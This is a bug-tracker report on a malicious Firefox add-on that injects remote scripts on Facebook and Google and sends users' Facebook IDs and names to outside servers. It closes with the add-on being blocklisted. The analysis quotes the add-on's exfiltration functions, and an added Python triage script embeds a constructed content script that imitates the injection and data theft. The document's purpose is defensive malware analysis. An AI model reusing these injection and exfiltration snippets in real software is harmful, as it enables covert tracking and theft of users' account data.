Bug 748993 - Malicious "Mukemmel Face+" add-on
Status: RESOLVED FIXED
Product: Toolkit
Classification: Components
Component: Blocklisting
Version: unspecified
Platform: All / All
Importance: -- normal
Target Milestone: ---
Assigned To: Jorge Villalobos [:jorgev]
Reported: 2012-04-25 15:07 PDT by MarkH
Modified: 2016-03-07 15:30 PST

Attachments
20120425_mukemmelface.zip (90.12 KB, application/octet-stream)
2012-04-25 15:07 PDT, MarkH

Description MarkH 2012-04-25 15:07:12 PDT
Created attachment 618446
20120425_mukemmelface.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.163 Safari/535.19

Steps to reproduce:

Downloaded add-on from www.mukemmelface.com/firefox.html


Actual results:

loads "adobeflashplayer.js" from XPI

    code is based on the less malicious "SocialFixer" plugin

    looks to see if it's on a Facebook or Google domain

    uses HTML5 local storage plus cookies to maintain config/state

    injects a <script> tag to load http://hadi.mukemmelface.com/mukemmelface.js?amtasak=<random_num> when on Facebook
    
    or,  injects a <script> tag to load http://hadi.mukemmelface.com/g.js?amtasak=<random_num> when on Google
    
mukemmelface.js:

    loads your public details into the DOM via a call to graph.facebook.com/<uid>&callback=cins
    
    contains the spam URL http://hadi.mukemmelface.com/reklam.html
    
    injects either a <script> tag to load http://hadi.mukemmelface.com/offline.js?cins=<1|2>&amtasak=<uid>&x=<random_number>
    
    ... or a <script> tag to load http://hadi.mukemmelface.com/zaza.js?cins=<1|2>&amtasak=<uid>&x=<random_number>
    
    and a <script> tag to load http://gator1620.hostgator.com/~vazgec/1333458695713783.jpg
    
    
g.js:

    empty at the time the analysis was done
    
    
offline.js / zaza.js (same file):

    JS to install a font
    
    
1333458695713783.jpg:

    not an image file, but javascript
    
    sends your FB UID to http://get.buzzzapps.com/xpi/lechat/get_th.php?id_user="+FB_UID+"&ck="+userKey+"&me="+FB_UID (since this loads on every Facebook page load, it also sends the current Facebook URL you're viewing as a referrer, allowing them to track you on Facebook)

    has the ability to send your FB UID and name to http://set.buzzzapps.com/xpi/lechat/register.php?name='+FB_NAME+'&fbid='+FB_UID
    
    sends your FB UID to http://sp1.buzzzapps.com/sp/upload.php?id_user='+FB_UID+'
    
    sends your FB UID to http://ads2.buzzzapps.com/xpi/css/'+a+'/'+FB_UID+'.css
    
    makes an Ajax request to http://cdn.mukemmelface.com/MukemmelFace.js?amtasak=<random_number>
    
    injects ads by appending to the FB ad unit via "<iframe id='"+pubid+"_fr' src='"+reklam+"?umtt="+utma+"&umte="+USER_TYPE+"&ub="+SEXE+"' style='border:0px;margin-left:0px' width='230' height='620' scrolling='no' ></iframe>"
    
    sends your name and FB UID when you submit a bug report via http://set.buzzzapps.com/xpi/lechat/bugreport.php?message="&name="+FB_NAME+&fbid="+FB_UID
    
    sends your name and FB UID to http://get.buzzzapps.com/xpi/lechat/get_all.php?id_post="+tableau_aid+"&id_user="+FB_UID+
    
    posts details of what you do on Facebook via 
    
    function setPost(aid,what){   
        ajaxeur("http://set.buzzzapps.com/xpi/lechat/set.php?id_post="+aid+"&id_user="+FB_UID       
        +"&type="+what,vide, function(){});	
    }
    function unsetPost(aid,what){
        ajaxeur("http://set.buzzzapps.com/xpi/lechat/unset.php?id_post="+aid+"&id_user="+FB_UID
        +"&type="+what,vide, function(){});	
    }
    
    posts status updates to your Timeline / Wall


Expected results:

It shouldn't post your Facebook account information to a 3rd party server or post as you on Facebook without your consent.
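The kind of static triage an analyst does on a report like the one above, as an added example that is not part of this bug, the attachment, or the add-on: unpack the XPI (a zip archive), pull every external host out of its JavaScript, and flag the two indicator types the report describes, a remote <script> injection and a check for whether the page is on a Facebook or Google domain. The XPI scanned here is constructed in memory from a small content script that imitates the described behaviour (it is not the real add-on; only the hostnames are taken from the report). The trailing `looks_like_jpeg` check covers the other trick in the report, a ".jpg" URL whose body is JavaScript: an analyst fetching the resource can compare the first bytes against the JPEG SOI marker instead of trusting the extension. Function and variable names are the example's own.

```python
"""Static triage of a Firefox XPI for the indicator types described in the report above."""
import io
import re
import zipfile
from urllib.parse import urlparse

# Constructed sample: a tiny content script that mirrors the behaviour in the
# bug (domain check, remote <script> injection from hadi.mukemmelface.com, UID
# exfiltration to buzzzapps.com). This is NOT the attachment from the bug.
SAMPLE_CONTENT_SCRIPT = r"""
var host = window.location.hostname;
if (host.indexOf("facebook.com") != -1) {
  var s = document.createElement("script");
  s.src = "http://hadi.mukemmelface.com/mukemmelface.js?amtasak=" + Math.random();
  document.body.appendChild(s);
} else if (host.indexOf("google.") != -1) {
  document.write('<script src="http://hadi.mukemmelface.com/g.js?amtasak=1"></script>');
}
ajaxeur("http://get.buzzzapps.com/xpi/lechat/get_th.php?id_user=" + FB_UID, vide, function(){});
"""

def build_sample_xpi():
    """Build the constructed XPI (a zip archive) in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("install.rdf", "<RDF/>")  # placeholder manifest, not a real one
        z.writestr("chrome/content/adobeflashplayer.js", SAMPLE_CONTENT_SCRIPT)
    return buf.getvalue()

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
# Either DOM-built script elements or a literal <script src=...> written into the page.
SCRIPT_INJECT_RE = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)|<script[^>]*\bsrc=", re.I)
TARGET_DOMAIN_RE = re.compile(r"(facebook|google)\.", re.I)
JPEG_MAGIC = b"\xff\xd8\xff"  # JPEG start-of-image marker

def looks_like_jpeg(data):
    """True if the bytes begin with the JPEG SOI marker; a '.jpg' body that fails this is suspect."""
    return data[:len(JPEG_MAGIC)] == JPEG_MAGIC

def triage_xpi(xpi_bytes, allowed_hosts=()):
    """Scan every .js member of an XPI; report external hosts and the two injection indicators."""
    allowed = {h.lower() for h in allowed_hosts}  # e.g. the add-on's own documented update host
    report = {"js_files": [], "remote_hosts": set(), "injects_remote_script": False,
              "checks_target_domains": False, "findings": []}
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith(".js"):
                continue
            report["js_files"].append(name)
            src = z.read(name).decode("utf-8", errors="replace")
            for url in URL_RE.findall(src):
                host = (urlparse(url).hostname or "").lower()
                if host and host not in allowed:
                    report["remote_hosts"].add(host)
            if SCRIPT_INJECT_RE.search(src):
                report["injects_remote_script"] = True
                report["findings"].append(f"{name}: injects a <script> element into the page")
            if TARGET_DOMAIN_RE.search(src):
                report["checks_target_domains"] = True
                report["findings"].append(f"{name}: checks whether the page is on a Facebook/Google domain")
    report["remote_hosts"] = sorted(report["remote_hosts"])
    report["js_files"].sort()
    return report

if __name__ == "__main__":
    r = triage_xpi(build_sample_xpi())
    for line in r["findings"]:
        print(line)
    print("remote hosts contacted:", ", ".join(r["remote_hosts"]))
    print("fake image is JPEG?", looks_like_jpeg(b"var x = 1;"))
```

Pass a real XPI's bytes to `triage_xpi` to get the same report; the host list is the part worth comparing against the add-on's stated purpose, since a Facebook helper that talks to two unrelated domains on every page load is the pattern this bug describes.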
Comment 1 Jorge Villalobos [:jorgev] 2012-04-25 16:31:30 PDT
ID: {45147e67-4020-47e2-8f7a-55464fb535aa}
Comment 2 Jorge Villalobos [:jorgev] 2012-04-25 16:33:41 PDT
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i86